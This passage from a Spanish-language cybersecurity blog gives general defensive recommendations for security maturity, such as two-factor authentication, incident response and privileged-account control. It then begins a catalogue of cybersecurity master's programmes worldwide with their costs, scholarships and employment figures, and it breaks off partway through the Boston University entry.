apetito al mismo que tengamos. Mientras que cualquier programa de seguridad formal requiere supervisión e inversión, llegar a una instantánea rápida del nivel de madurez no debería ser un esfuerzo prolongado. Por ello, os muestro algunas acciones efectivas a considerar a la hora de proporcionar la base para la evaluación de nuestro nivel de madurez en seguridad de la información, acciones que nos produciran un grab rendimiento a corto plazo si las tomamos, con un alto impacto contra el riesgo continuo de las amenazas. - Invertir en la retención del talento en seguridad. La tecnología por sí sola no puede manejar el riesgo de incumplimiento. Las organizaciones a menudo implementan el último control de seguridad o los últimos dispositivo, pero los mismos no se tienen configurados o monitorizados adecuadamente para que realicen lastareas de una forma efectiva. Debemos aplicar el nivel adecuado de supervisión y habilidad humana para optimizar las soluciones implantadas, ya bien sea contratando, subcontratando o realizando una combinación de ambas. - Insistir en una cultura de conciencia de seguridad . La sensibilización y la capacitación son fundamentales. Establecer un tono en la parte superior, insistiendo en la responsabilidad de los empleados por adherirse, cumplir y comprender las políticas de seguridad, procesos y procedimientos, no sólo dentro de TI, sino a través del negocio es fundamental, pero esta misma concienciación entre los líderes funcionales, debería ser algo impescindible. - Mejorar la visibilidad del entorno. El nuevo perímetro para la seguridad son claramente los usuarios finales basados ​​en puntos de acceso iniciales que hemos visto en incontables brechas. La pregunta que debemos hacernos es "¿Mi organización tiene visibilidad sobre la actividad de amenazas en todos los dispositivos del empleado, incluso cuando no están en el entorno corporativo tradicional? ¿Cómo puedo instrumentar los puntos de acceso remoto para aumentar mi visibilidad hacia una rápida detección? " > Debemos tomar la Cloud como una extensión de nuestro dominio de seguridad. Durante muchos años, la mayoría de las organizaciones vivirán en un entorno híbrido en el que las discusiones de negocios impulsarán la adopción de la nube. ¿Tiene sentido el mismo nivel de confianza y de controles de seguridad en distintos dominios? - Desarrollar un plan de respuesta ante incidentes. Debemos crear un equipo CSIRT que esté bien construido, dotado de recursos y que ensaye de manera regular múltiples escenarios de riesgo. Debemos asegurarnos de que los equipos estén listos y tenga expertos cualificados para manejar las complejidades de una respuesta ante violaciones de seguridad. La detección rápida y la respuesta rápida no son prioridades negociables, las mismas una vez se den dichas violaciones, acortaran posibles perdidas o problemas. - Mejorar el diseño de la red y la segmentación de datos. La mayoría de las organizaciones no han identificado formalmente qué activos son más críticos para ellos, o no documentan con precisión su red, pero esto el principal paso para conocer nuestra exposición. Sólo entonces podremos segmentar datos y sistemas críticos para aplicar una defensa en capas con un mejor diseño de red para protegerlos. - Implementar la autenticación de dos factores. Creo que debería ser una de las principales recomendaciones, teniendo en cuenta que el modelo de conexión desde cualquier lugar, es una realidad. Nos encontramos con que el nombre de usuario y las contraseñas comprometidas se utilizaban con frecuencia para "iniciar sesión" en las redes de cliente a través de sistemas de acceso remoto (por ejemplo, Outlook Web Access, VPN, VDI). Como resultado, la detección de estos ataques, una vez comprometida la password, es muy dificil de detectar. Agregar una capa adicional de autenticación - algo que debemos saber (contraseña) + algo que debemos tener (por ejemplo, un token) debe ser un control de seguridad crítico. - Controlar el uso de cuentas privilegiadas. Los privilegios de administrador deben ser la excepción, no la norma. Limitar el número de personas que tienen cuentas privilegiadas para instalar software y, si es posible, realizar listas de privilegios, ya bien sean "listas blancas" o "listas negras". Además, las cuentas de administrador deben ser auditadas con la mayor frecuencia posible para asegurar que se asignen a un administrador que todavía tiene una necesidad válida para dichos privilegios. Las cuentas de administración en general nunca deben utilizarse para tareas rutinarias o del día a día. - Tecnologías de Sandbox. El phishing fue el vector de ataque predominante en los compromisos de respuesta a incidentes, según estudios de 2016. El uso de tecnologías de sandboxing avanzadas para detonar archivos adjuntos de correo electrónico y enlaces web antes de que los empleados los vean es fundamental como parte de la estrategia de "prevención" de una organización. La naturaleza humana es ser curioso, así que a pesar de la mejor formación en conciención, debemos poner herramientas acordes. - Realizar evaluaciones continuas de vulnerabilidad y remediación. La higiene de entornos TI es la base de cualquier programa de seguridad. Con regularidad, debemos realizar evaluaciones para identificar las vulnerabilidades y asegúrese de que existe un plan para cerrar y corregir dichas brechas. > You don't know what you don't know. - Identificar amenazas que ya existen en el entorno. El tiempo promedio antes de que se detecten amenazas avanzadas en entornos corporativos es de más de 300 días. Antes de implementar nuevas soluciones de seguridad, debemos empezar a considerar la limpieza de nuestra casa. La caza de amenazas dirigida puede reconocer comportamientos de amenaza incluso sin el malware presente, ayudándo a identificarlas antes de que nos podamos hacer daño. --- # Los mejores master en ciberseguridad URL: https://ciberseguridad.blog/los-mejores-master-en-ciberseguridad-del-mundo/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-08-13 Actualizado: 2026-10-04 Tema: Curso y Master en Ciberseguridad > Las mejores instituciones de educación superior por todo el mundo están ofreciendo másters en ciberseguridad y programas de investigación para profesionales de la seguridad de la información que buscan lanzar su carrera. Los siguientes son los másters y programas de investigación más valorados. Elegir universidad es una decisión importante para cualquiera. La tasa de cambio e innovación dentro del campo de la ciberseguridad sólo sirve para que el proceso de decisión sea mucho más difícil para Las mejores instituciones de educación superior por todo el mundo están ofreciendo másters en ciberseguridad y programas de investigación para profesionales de la seguridad de la información que buscan lanzar su carrera. Los siguientes son los másters y programas de investigación más valorados. Elegir universidad es una decisión importante para cualquiera. La tasa de cambio e innovación dentro del campo de la ciberseguridad sólo sirve para que el proceso de decisión sea mucho más difícil para los estudiantes que desean seguir una educación superior. La buena noticia es que cada vez más universidades están ofreciendo programas de grado sobre ciberseguridad, y muchas están participando en investigación innovadora (lo que significa que los estudiantes tienen la oportunidad de participar en la investigación y oportunidades de aprendizaje en muchas de las principales instituciones). Lo que es más, la escasez mundial de talento en ciertas áreas significa que la búsqueda de un grado o programa de investigación dentro del campo puede ser un movimiento de carrera altamente gratificante y satisfactorio. Si bien éstas universidades y programas no se clasifican en ningún orden en particular, hemos considerado una variedad de factores para crear esta lista de mas de 80 excepcionales universidades y programas de grado en ciberseguridad: Iniciativas de investigación, designaciones y certificaciones profesionales, programas de estudios y programas de grado ofrecidos, costos y oportunidades de becas y asociaciones/afiliaciones. Por supuesto, no cada universidad o programa es la mejor opción para cada estudiante; Por lo tanto, esta lista pretende representar a muchas de las principales instituciones que ofrecen programas educativos en estos campos especializados de estudio que creemos que vale la pena su consideración. Los datos de matrícula y costos están vigentes para el año académico 2015/2016 en la mayoría de los casos, pero están sujetos a cambios ya que las universidades pueden actualizar anualmente la matrícula y las tarifas. Si estas considerando un máster en ciberseguridad, esta lista es un excelente lugar para comenzar la búsqueda. ## Abertay University (Dundee, Escocia) [Imagen: Ethical Hacking Abertay] Grados ofrecidos - Máster en hacking ético - Grado en hacking ético El Máster de la Universidad Abertay en Hacking Ético & Ciberseguridad es un programa que se puede completar en un año de estudio a tiempo completo o dos años de estudio a tiempo parcial. Los estudiantes adquieren competencia en una amplia gama de temas, desde la computación forense hasta la seguridad de la red. Este programa está diseñado para estudiantes con un importante estudio de pregrado en desarrollo de software o redes. Abertay BSc en Hacking Ético es un programa que fue creado por primera vez en 2006, por lo que es el primer grado en el mundo con la palabra "hacking" en el título. Los investigadores de seguridad cibernética en Abertay tienen estrechos vínculos con los líderes de la industria y trabajan para proporcionar soluciones a los problemas del mundo real en desarrollo, presentando una variedad de oportunidades de investigación para los estudiantes. Costes - Estudiantes de Escocia y Unión Europea: £4000 - Estudiantes de Inglaterra, Gales e Irlanda del norte: £4000 - Estudiantes No-Europeos: £12200 Contratación/tasa de empleo No hemos localizado estadísticas específicas sobre los resultados de los estudiantes y las tasas de empleo de los graduados, un artículo de Enero de 2014 en The Courier cita al tutor del programa Colin McLean, quien también lanzó el programa de hacking ético de la universidad diciendo, "Las perspectivas de empleabilidad para nuestros estudiantes son enormes. Actualmente, no podemos producir bastantes graduados para los trabajos que están ahí fuera." El Boletín HELOA de Escocia para Consejeros Escolares de Abril de 2014 señala que desde el lanzamiento del programa en 2006, se ha consolidado una excelente reputación por ofrecer a los graduados los atributos requeridos por las principales empresas de seguridad en el Reino Unido. Becas ofrecidas Para los estudiantes que siguen el programa de máster, los fondos de postgrado (cuota de matrícula y préstamo de costo de vida) pueden estar disponibles en la Agencia de premios estudiantiles de Escocia para aquellos que cumplen con los criterios de elegibilidad. Para estudiantes de Escocia, la Universidad de Abertay ofrece tres becas Carnegie-Cameron para estudios de postgrado. La beca está disponible para los estudiantes como un curso de grado de un año impartido en posgrado y se otorga como una deducción de las tasas de matrícula del curso. Los fondos discrecionales y de cuidado de niños son administrados por la Universidad; los estudiantes también pueden buscar en fondos educativos y organizaciones benéficas buscando recursos como Acción Familiar o Scholarship Search. Afiliaciones/Asociaciones La sociedad de Abertay sobre Hacking Ético dirige la conferencia Securi-Tay, que consiste en un día de charlas y discusiones de líderes de la industria, académicos y estudiantes de los cursos de grado de Hacking Ético de Abertay. La conferencia de seguridad más grande de Escocia, Securi-Tay está organizada enteramente por los estudiantes de Hacking Ético de Abertay. Las áreas de investigación de la seguridad cibernética incluyen la piratería ética, la seguridad utilizable, la biometría, la forense digital, la seguridad / visualización forense digital, los sistemas de inteligencia, la seguridad omnipresente, la seguridad del sistema móvil, la seguridad smartgrid y los aspectos humanos y sociales de la seguridad para proporcionar oportunidades de investigación en el mundo real. ## IMF Business School (Madrid, España) [Imagen: Master Ciberseguridad IMF Universidad Camilo Jose Cela] Grados ofrecidos - Master en Ciberseguridad Presencial y Online - Master en Seguridad de la Información: certificación, protección y tecnología IMF Business School, Deloitte y la Universidad Camilo José Cela, han desarrollado este Master en Ciberseguridad (Siendo uno de los pocos desarrollados por una empresa privada, lo que le dá este diferencial en la actual lista de mejores masters en ciberseguridad), optando por una formación online de alto nivel, siendo el único master del mercado totalmente online y respaldado por una Universidad. Uno de los puntos a tener en cuenta y por el cual se incluye en esta lista, es que los mejores alumnos serán seleccionados por Deloitte para la realización de prácticas profesionales en su CyberSOC, obteniendo altas tasas de incorporación tras su finalización, ademas de esta, IMF mantiene acuerdos de cooperación educativa para la formación en puestos de trabajo con importantes empresas como Telefonica (CyberSOC) , Indra o BBVA entre otras. Costes - Master en Ciberseguridad Presencial: 17000€ con beca 8500€ - Master en Ciberseguridad Online: 7800€ con beca 3900€ - Master en Seguridad de la Información: 7800€ con beca 2730€ Contratación/tasa de empleo Como ya hemos visto, uno de los puntos fuertes del Master en Ciberseguridad es la realización de practicas en Deloitte y otras grandes empresas con importantes SOC. Desde IMF nos indican que los dos primeros Master en Ciberseguridad Presencial y Online cuentan con un 85% de puestos de prácticas garantizadas en el CyberSOC de Deloitte y un 80% para el Master en Seguridad de la Información Afiliaciones/Asociaciones IMF es socio de la ATI - Asociación de Técnicos de la Información y el TÜV Rheinland. ## Massachusetts Institute of Technology (Cambridge, Estados Unidos) [Imagen: Security Massachusetts Institute of Technology] El MIT es nombrado como el mejor programa online de ciberseguridad. El Lincoln Laboratory del MIT es un centro de investigación y desarrollo con fondos federales, enfocado en aplicar tecnología avanzada a los problemas de seguridad nacional. En marzo de 2015, el MIT anunció tres nuevas iniciativas de seguridad cibernética, que abordarán el problema de la ciberseguridad desde tres ángulos: tecnología, políticas públicas y gestión organizacional. Mientras que el MIT no ofrece un programa específico de estudio centrado en la seguridad cibernética o la seguridad de la información, los estudiantes que persiguen programas de grado más amplio, tales como Ingeniería Eléctrica y Ciencias de la Computación, pueden fácilmente diferenciarse participando activamente en las oportunidades de investigación disponibles. Costes - Tiempo completo (grado y pregrado): $23,200 por semestre - Por crédito: $725 Contratación/tasa de empleo De acuerdo con el informe MIT 2015, el veintiuno por ciento de los graduados de licenciatura de 2014 ha encontrado un puesto de trabajo a través de reclutamiento en el campus. Diecinueve por ciento de los beneficiarios de licenciatura tenían pasantías que llevaron a ofertas de empleo, y otro 19% encontró empleo a través de una feria de carreras en la universidad. El 18% encontró empleo a través de lugares de trabajo en red. El 80% de los titulados de la Maestría entró en el sector laboral, mientras que el 12% continuó con la escuela de posgrado. Los principales empleadores fueron Google, Oracle, McKinsey, Morgan Stanley, Accenture, Amazon, AthenaHealth, ExxonMobil, Microsoft, Boston Consulting Group, Goldman Sachs, Palantir y Shell. Los principales empleadores para los receptores de máster fueron McKinsey, Amazon, Apple, Bain, Boston Consulting Group, Google, Deloitte, MIT, Microsoft, la Fuerza Aérea de Estados Unidos, Goldman Sachs y la Marina de los Estados Unidos. El MIT es altamente conocido ya que de allí salieron grandes figuras. Becas ofrecidas Aunque el MIT señala que el 56% de los estudiantes universitarios recibió becas del MIT con un promedio de 34.551 dólares por estudiante en 2013-2014, hay poca información disponible en el sitio web del MIT sobre oportunidades de becas específicas disponibles para estudiantes. Sin embargo, se observa que cualquier estudiante que solicite ayuda financiera y rellene un perfil CSS optará automáticamente para las becas del MIT. Afiliaciones/Asociaciones El MIT tiene asociaciones industriales con compañías como Amgen, Merck, Ford Motor Company, Nippon Telegraph y Telephone Corporation, Merrill Lynch, Dupont, Microsoft y Hewlett-Packard. Las asociaciones y programas de intercambio del MIT incluyen el Consorcio de Graduados en Estudios sobre la Mujer, el MISTI, el Programa de Becas de Intercambio, el Instituto Cambridge-MIT, las Ciencias y Tecnologías de la Salud de Harvard-MIT y otras áreas interdisciplinarias de estudio e investigación. ## Università degli Studi di Genova (Genova, Italia) [Imagen: Master en Ciberseguridad y Protección del Dato Universidad de Genova] Grados ofrecidos - Master en Ciberseguridad y Protección del Dato El programa de Master en Seguridad Cibernética y Protección de Datos se ofrece conjuntamente con el Instituto de Estudios de Tecnología de Información y Comunicaciones de Italia (ISICT) en colaboración con la Fundación Ansaldo, ofreciendo dos opciones de especialización: Por un lado Respuesta a Incidentes y Forense Digital, y por otro protección de Infraestructura Crítica y Automatización Industrial. Los estudiantes eligen una especialización al final de la Parte I del programa de Master. Costes - 2500€ para desempleados - 6500€ para los empleados - 271€ tasas universitarias Becas ofrecidas Cursando los estudios, se dispondrá de un cupón gratuito específico de apoyo y capacitación para realizar un intento de certificación en GIAC o un examen en en el Instituto SANS de Certificaciones Acreditadas como ANSI / ISO / IEC 17024, ademas de la participación gratuita de los estudiantes en el curso de ISO / IEC 27001. Afiliaciones/Asociaciones El programa de Master en Seguridad Cibernética y Protección de Datos se asocia con varias organizaciones, incluyendo Selex ES, DITEN, Dibris, Postitaliane y otras muchas. ## San Pablo CEU (Madrid, España) [Imagen: master-proteccion-del-dato-ceu-san-pablo] Grados ofrecidos - Máster Universitario en Protección de Datos, Transparencia y Acceso a la Información Dicho master gira en torno al derecho a la protección de datos y las cuestiones que suscita la aplicación de las normas jurídicas en un entorno de innovación tecnológica en el que la transparencia y el acceso a la información, por un lado, y la seguridad y el buen uso de la información, por otro, se manifiestan imprescindibles. Es uno de los pocos master enfocados a la protección del dato, una carrera con amplio recorrido, y mas ahora que esta en boca de todos la GDPR. El master y como indica en la web del propio centro, esta impartido por un amplio espectro de profesionales reconocidos del sector, donde podemos encontrar por ejemplo desde grandes figuras de empresas IBEX 35, como Victor Manuel Ruiz Gomez, Gerente de Tecnologías de la Seguridad y Ciberseguridad en Telefonica España , hasta figuras de BBVA , IAG o Google. Becas Ofrecidas La Fundación Universitaria San Pablo CEU, consciente de sus fines de interés general benéfico-docentes y sociales, facilita el acceso a los estudios impartidos en la Universidad CEU San Pablo a los alumnos, teniendo en cuenta su adecuado rendimiento académico, así como la situación socioeconómica y familiar del solicitante, acreditada documentalmente por el alumno peticionario Afiliaciones/Asociaciones Con la realización del Master se obtiene la certificación ACP de la Asociación Profesional Española de la Privacidad.(APEP). Por otro lado, existe un convenio con la Cátedra Google que ofrece becas de matrícula a los alumnos seleccionados. Asimismo, existe un convenio con el Instituto de Transparencia, Acceso a la Información Pública y Protección de Datos Personales del Estado de México y Municipios. Y por último y de igual forma el máster colabora con el proyecto de investigación sobre Privacidad y Acceso, financiado por el Ministerio de Economía y Competitividad. ## Bellevue University (Bellevue, Estados Unidos) [Imagen: Máster Ciberseguridad Bellevue] Grados ofrecidos - Grado en Ciberseguridad - Máster en Ciberseguridad La Universidad de Bellevue ofrece programas de licenciatura y máster en seguridad informática. Situado en Bellevue, Nebraska, el Centro para estudios de ciberseguridad de la Universidad de Bellevueis es designado como Centro Nacional de Excelencia Académica en Educación de Aseguramiento de la Información por el NSA / DHS. Bellevue University obtiene los normalmente los primeros puestos en los ranking de Universidades de Ciberseguridad. Coste - Pregrado: $ 275 por crédito - Internacional: $350 por crédito - Posgrado: $525 por crédito Becas ofrecidas El programa de becas de la Universidad de Bellevue está diseñado principalmente para ayudar a estudiantes necesitados. Los fondos de becas son proporcionados por una variedad de fuentes y donantes, y se otorgan becas de habilidad especial para la competencia en áreas seleccionadas, tales como atletismo, arte y proyectos especiales. Afiliaciones/Asociaciones El Centro para estudios de ciberseguridad de la Universidad de Bellevueis es designado Centro Nacional de Excelencia Académica por la NSA/DHS y mantiene estrechos lazos con la misma. ## De Montfort University (Leicester, Reino Unido) [Imagen: Master Ciberseguridad Montfort University] Grados ofrecidos - Máster en Ciberseguridad - Grado en Seguridad Informática - Grado en Informática Forense - Doctorado en Ciberseguridad y Tecnologías Software - Máster en Cibertecnología De Montfort University ofrece una variedad de programas relacionados con la seguridad cibernética en los niveles de pregrado y posgrado. La Universidad de Montfort es el hogar del Centro de ciberseguridad, un grupo multidisciplinario de académicos y expertos de la industria que se centran en una amplia variedad de cuestiones de seguridad cibernética y forense digital a través de la investigación, educación, formación, y servicios de consultoría. Los estudiantes que participan en programas de pregrado y posgrado en ciberseguridad y tecnología en la Universidad De Montfort obtienen una visión holística de la ciberseguridad y el conocimiento en los últimos principios, herramientas y técnicas de un equipo de instructores especializados. Coste Pregrado: - Tiempo completo: £9,000 por año - Tiempo completo Internacional: £12,250 por año - Tiempo Parcial - 4 años: £5,925 por año - Tiempo Parcial - 6 años: £3,950 por año - Por módulos: £988 por 15 creditos Grado: - Impuesto standard de cursos de grado: £9,900 por año - Impuesto standard Internacional: £12,700 por año - Impuesto de residencia por año de grado: £650 - Impuesto de residencia Internacional por año de grado: £75 Contratación/tasa de empleo En Julio de 2015, la universidad de Montfort fue nombrada entre las 25 universidades de grado con más empleabilidad. Los resultados de la encuesta anual de destino de los que abandonan la educación superior informaron que el 95,8% de los graduados de la DMU del verano de 2014 estaban trabajando o en estudios posteriores seis meses después de la graduación, por encima del promedio nacional del 93,2%. Becas ofrecidas Los estudiantes de posgrado pueden ser elegidos para premios tales como las Becas 2020 del Vicerrectorado, las Becas Internacionales para Antiguos Alumnos y otras becas internacionales y descuentos por pagos anticipados. Afiliaciones/Asociaciones El Centro de Seguridad Cibernética está involucrado en iniciativas como el Campus Cyber Champions y con la Trustworthy Software Initiative (TSI). ## New York University (Nueva York, Estados Unidos) [Imagen: Máster Ciberseguridad Universidad de Nueva York] Grados ofrecidos - Máster en ciberseguridad El máster de la Universidad de Nueva York en ciberseguridad se ofrece online, permitiendo a los estudiantes adquirir una base sólida en las tecnologías clave de seguridad informática y red, forense digital, criptografía y biométrica El Laboratorio de Seguridad de Sistemas de Información y Seguridad de la Universidad de Nueva York es un laboratorio financiado por la NSF y un Centro de Excelencia designado por la NSA que proporciona un enfoque para la investigación multidisciplinario con educación práctica en áreas emergentes de la seguridad de la información como forense digital, hardware para sistemas seguros, marca de agua digital y esteganografía. Coste - 3 créditos: $4,878 - 6 créditos: $9,756 - 9 créditos: $14,634 - 12 créditos: $19,500 - 15 créditos: $24,378 Becas ofrecidas Varias becas están disponibles a través de la Universidad de Nueva York incluyendo la Beca de Aseguramiento de la Información del Departamento de Defensa, entre otras opciones disponibles para los estudiantes. Afiliaciones/Asociaciones El Laboratorio de Seguridad de Sistemas de Información y de Internet en NYU ha sido designado como Centro Nacional de Excelencia Académica en Operaciones Cibernéticas por el NSA / DHS. ## Johns Hopkins University (Baltimore, Estados Unidos) [Imagen: Captura-de-pantalla-2017-08-10-a-las-19.17.59-compressor-2] Grados ofrecidos - Máster en Informática de Seguridad centrado en Tecnología e Investigación o Política y Gestión - Máster en Ciberseguridad La Universidad Johns Hopkins es otra de las primeras universidades en las listas de estudios en ciberseguridad. Los programas ofrecen dos vías como se indica en los grados ofrecidos.Un programa de doctorado en critografía y privacidad ó salud y seguridad médica. Johns Hopkins también ofrece un Certificado de Ciberseguridad Post-Máster, ofreciendo los cursos en Ciberseguridad online o en el campus. Costes - Grado: $48,710 por año Contratación/tasa de empleo De acuerdo con el informe de la Universidad Johns Hopkins de 2012-13, se cita una tasa de empleo entre esta misma muestra del 41%, con una tasa de satisfacción de los alumnos del 84%. Becas ofrecidas Johns Hopkins University recibió una subvención de la National Science Foundation para apoyar el programa de postgrado en la enseñanza de los estudiantes que descubran y protejan amenazas, como parte del programa nacional de becas CyberCorps. Afiliaciones/Asociaciones Johns Hopkins University es designada como Centro Nacional de Excelencia Académica en Educación e Investigación de Aseguramiento de la Información por la NSA / DHS. El Instituto de Seguridad de la Información de JHU es uno de los primeros centros de investigación universitarios dedicados a la seguridad de la información y sirve como punto focal de la Universidad para la investigación y educación en seguridad, privacidad y seguridad de la información. ## Eindhoven University of Technology (Eindhoven, Holanda) [Imagen: Master-Ciberseguridad-Holanda] Grados ofrecidos - Máster en Tecnologías de Seguridad de la información - Máster en ciberseguridad Los cursos son impartidos por el grupo de investigación Digital Security (DS) de la Universidad Radboud y EI / PSI en la Universidad Tecnológica de Eindhoven. Los estudiantes pasan, en promedio, un día por semana tomando cursos en la universidad asociada. El Instituto de Eindhoven para la Protección de Sistemas y la Información (EI / PSI) en la Universidad de Tecnología de Eindhoven se compone de dos grupos: el Grupo de Seguridad y el Grupo de Teoría de Codificación y Criptología, ambos con importantes oportunidades para los estudiantes. Costes - UE o estados con permiso: 1.951 euros - Licenciatura sin permiso: 8,678 € - Máster sin permiso: 13.561 € Contratación/tasa de empleo Después de la graduación, los estudiantes con títulos de la Universidad de Tecnología de Eindhoven tienen una variedad de opciones donde elegir, incluyendo funciones como administrador de servicios de información, ingeniero de servicios de información y criptólogo, entre otros. La página de carreras de la Universidad de Eindhoven indica que los graduados de TU a menudo se convierten en líderes en sus carreras posteriores. Los egresados se encuentran en la política nacional, en las plantillas de las organizaciones de investigación y en los equipos directivos de las mejores compañías holandesas. Becas ofrecidas Hay pocas becas abiertas para estudiantes internacionales que cursen estudios de pregrado. Sin embargo, los estudiantes de postgrado pueden solicitar una serie de becas, como el Programa de Becas Amandus H. Lundqvist (ALSP), que ofrece matrícula y exenciones de cuotas o contribuciones a los costes de vida. Afiliaciones/Asociaciones El Instituto Eindhoven para la Protección de Sistemas e Información (EI / PSI) participa en la actividad de seguridad de NIRICT, el Instituto Neerlandés de Investigación sobre las TIC. El Grupo de Seguridad, uno de los dos grupos que operan bajo EI / PSI, es financiado por CeDICT (el Centro de Sistemas TIC Confiables), uno de los centros de excelencia de la federación 3TU de universidades técnicas en los Países Bajos. ## ETH Zurich (Zurich, Suiza) [Imagen: Master Ciberseguridad Suiza] Grados ofrecidos - Master en Seguridad de la Información El programa de seguridad de la información es un programa de seguridad de amplio espectro que proporciona un conocimiento profundo de los problemas de seguridad pertinentes en los sistemas informáticos, redes y sus aplicaciones.El programa ofrece numerosos cursos relacionados con la seguridad que abarcan temas como la criptografía, métodos formales, Seguridad, seguridad de red inalámbrica y protocolos de seguridad. El programa y sus estudiantes se benefician de una estrecha colaboración con el ZISC (Zürich Information Security and Privacy Center), que comenzó su operación en septiembre de 2003 con el objetivo de reunir a la academia y la industria para llevar a cabo investigaciones y educación en seguridad de la información. Contratación/tasa de empleo Los dominios de aplicación típicos y los empleadores potenciales para los graduados del programa de Máster de Seguridad de la Información incluyen servicios bancarios y financieros, instituciones gubernamentales y militares, proveedores de telecomunicaciones e Internet, instituciones educativas, proveedores de servicios Cloud, desarrollo tecnológico e investigación, consultoría de TI y mucho más. Según el informe ETH Zurich Employment Statistics 2008 report, dos o tres meses después de la graduación, el 88,4% de los graduados han encontrado un trabajo o tienen perspectivas (5,2%) aún no han comenzado a buscar un empleo y 6,4% no lograron encontrar un empleo. Becas ofrecidas ETH Zurich ofrece dos oportunidades de becas para los estudiantes que buscan programas de máster, incluyendo el Programa de Becas y Oportunidades de Excelencia y el Programa de Becas Maestras. La Beca de Excelencia incluye una beca para gastos de vida y estudio (11.000CHF por semestre), así como una exención de cuota de matrícula, mientras que la Beca de Máster consiste en un estipendio parcial por gastos de vida y estudio (6.000CHF por semestre) y la exención de cuota, ademas la Comisión Federal Suiza de Becas para Estudiantes Extranjeros (FCS) otorga becas para estudios de postgrado a estudiantes extranjeros con título universitario. Afiliaciones/Asociaciones En el otoño de 2011, ZISC se reestructuró con nuevos socios, entre ellos armasuisse, Credit Suisse, Kaba, NEC y Zürcher Kantonalbank. La ETH de Zurich también se asocia con alianzas universitarias internacionales seleccionadas con objetivos en línea con los de ETH Zurich, incluyendo la IARU - Alianza Internacional de Universidades de Investigación, IDEA League, ISCN - Red Internacional de Campus Sostenible, GULF - Global University Leaders Forum, GlobalTech - Universidades Tecnológicas, y UNITECH Internacional. ETH Zurich es también miembro de varias organizaciones y redes nacionales e internacionales. ## Fordham University (Nueva York, Estados Unidos) [Imagen: Master en Ciberseguridad Fordham University] Grados ofrecidos - Máster en ciberseguridad De acuerdo con un artículo de la CSO, la Escuela de Estudios Profesionales y Continuos de la Universidad de Fordham en Nueva York ofrece un programa de Máster en Ciberseguridad de 30 créditos con cursos de especialidad incluyendo Seguridad Inalámbrica, Informática Forense, Detección de Intrusión y Análisis de Malware y Seguridad del Software, Respuesta a incidentes, y otros. El programa de grado está diseñado para los profesionales que ya tienen un título de licenciatura en ciencias de la computación, ingeniería informática, ciencia de la información o tecnología de la información. Coste - Grado Ciencias: $1,421 por crédito Contratación/tasa de empleo De acuerdo con un informe de 2009 de Fordham University, el 68% de la clase de pregrado estaba empleada en el momento de realizar la encuesta. Como se señaló anteriormente, el programa de grado está diseñado para los profesionales ya empleados en el campo que están tratando de ampliar sus conocimientos. Becas ofrecidas Fordham University ofrece una serie de becas, aunque la mayoría de las becas sólo están disponibles para los estudiantes de pregrado. Además, las becas restringidas están disponibles para los solicitantes de pregrado, pero estos programas tienen criterios muy específicos y limitantes. Afiliaciones/Asociaciones Fordham University acoge la Conferencia internacional sobre ciberseguridad con el FBI. ## Imperial College London(Londres, Reino Unido) [Imagen: Master en Ciberseguridad Universidad Imperial College] Grados ofrecidos - Máster en Computación Especialidad Seguridad de Sistemas Software El programa de Máster en Computación del Imperial College de Londres está diseñado para estudiantes que han estudiado una cantidad considerable de computación y ofrece una especialización en Seguridad del Software. El programa se especializa en los procesos y mecanismos por los cuales los equipos informáticos, la información y los servicios están protegidos contra el acceso no intencionado o no autorizado. El Imperial College de Londres es el hogar del Instituto de Ciencia y Tecnología de Seguridad, fundado en 2008 como uno de los cuatro Institutos Globales del Colegio Imperial formado para promover el trabajo interdisciplinario para enfrentar los mayores desafíos que enfrenta la sociedad, convertirse en un punto focal para actividades multidisciplinarias y una interfaz con las partes interesadas, y formular y aplicar nuevas áreas de soluciones de conocimiento y tecnología, así como proporcionar asesoramiento científico independiente. Los proyectos de investigación incluyen seguridad cibernética y análisis de datos, seguridad física e infraestructura crítica, medio ambiente, salud y seguridad CBRN. Coste - Tiempo Completo: £28,200 - Tiempo Parcial: £2,820 - Tiempo Parcial por projecto: £5,640 Contratación/tasa de empleo El Imperial College London lleva a cabo anualmente la encuesta de Educación Superior (DLHE) para determinar qué graduados se han trasladado a seis meses después de la graduación. En 2014 los egresados del programa de Máster en Informática, el 82% había encontrado empleo en el momento en que se realizó la encuesta, el 13% había ingresado en nuevos estudios y el 5% informó que no estaban buscando empleo, estudio o capacitación. Dejando un cero por ciento de los encuestados que informaron que actualmente estaban buscando empleo. Becas ofrecidas El Imperial College de Londres ofrece una variedad de becas para apoyar a los estudiantes de postgrado, que se pueden buscar en función de criterios como nivel de grado o departamentos. Para los estudiantes extranjeros, las becas disponibles para los estudiantes en el programa de Máster en Informática incluyen la Becas Imperial Marshall, Becas Master Santander, Becas Leonard Chow Engineering, Becas Commonwealth y otras que ofrecen premios que van desde estipendios y matrícula parcial hasta becas completas incluyendo matrícula, Y estipendio. Afiliaciones/Asociaciones El Instituto de Ciencia y Tecnología de Seguridad interactúa con una amplia gama de usuarios finales del sector público y privado y guía la contribución del Colegio de ciencia y tecnología de seguridad internacional con el objetivo de generar soluciones de valor para la población en general. Imperial College London es designado como un centro académico de excelencia en la investigación de seguridad cibernética por el GCHQ. ## Boston University (Boston, Estados Unidos) [Imagen: Master Ciberseguridad Universidad de Boston] Grados ofrecidos - Grado en Ciencias de la computación Especialidad en Criptografía y Seguridad del Dato - Master en Ciberseguridad Los estudiantes que se especializan en Ciencias de la Computación en la Universidad de Boston pueden optar por la especialización en Criptografía y Seguridad de Datos, ofreciendo a los estudiantes la opción de participar en una serie de cursos tanto dentro del departamento como en otros lugares de la Universidad de Boston. Los estudiantes también tienen acceso al Grupo de investigación de la Universidad de Boston, que está encabezado por cuatro miembros de la facultad de Ciencias de la Computación incluyendo a Ran Canetti, Sharon Goldberg, Leonid Reyzin y Nikos Triandopoulos. El Grupo de investigación de la Universidad de Boston se especializa en criptografía y seguridad informática. Coste: - Pregrado: $ 23,711 - Grado: $47,422 - Tiempo Parcial: $1,482/credito Contratación/tasa de empleo La demanda de graduados de la Universidad de Boston es alta. Los antiguos alumnos del programas de BA, MA y PhD trabajan en empresas de alta tecnología, como Google, Akamai y Microsoft, o son contratados por las principales industrias financieras, de entretenimiento, salud o defensa, entre otros. Becas ofrecidas Un equipo de la Universidad de Boston recibió 3 millones de dólares de la NSF para estudiar los softphones. El proyecto tiene como objetivo final comprender cómo los problemas de seguridad asociados con los softphones y sus redes son diferentes de los de las computadoras y redes tradicionales, y cómo aprovechar las capacidades únicas de los softphones para mejorar la seguridad. Los estudiantes que estén interesados ​​en programas de Aseguramiento de la Información en la Universidad de Boston pueden solicitar becas completas a través del Departamento de Defensa. Afiliaciones/Asociaciones La Universidad de Boston está designada como 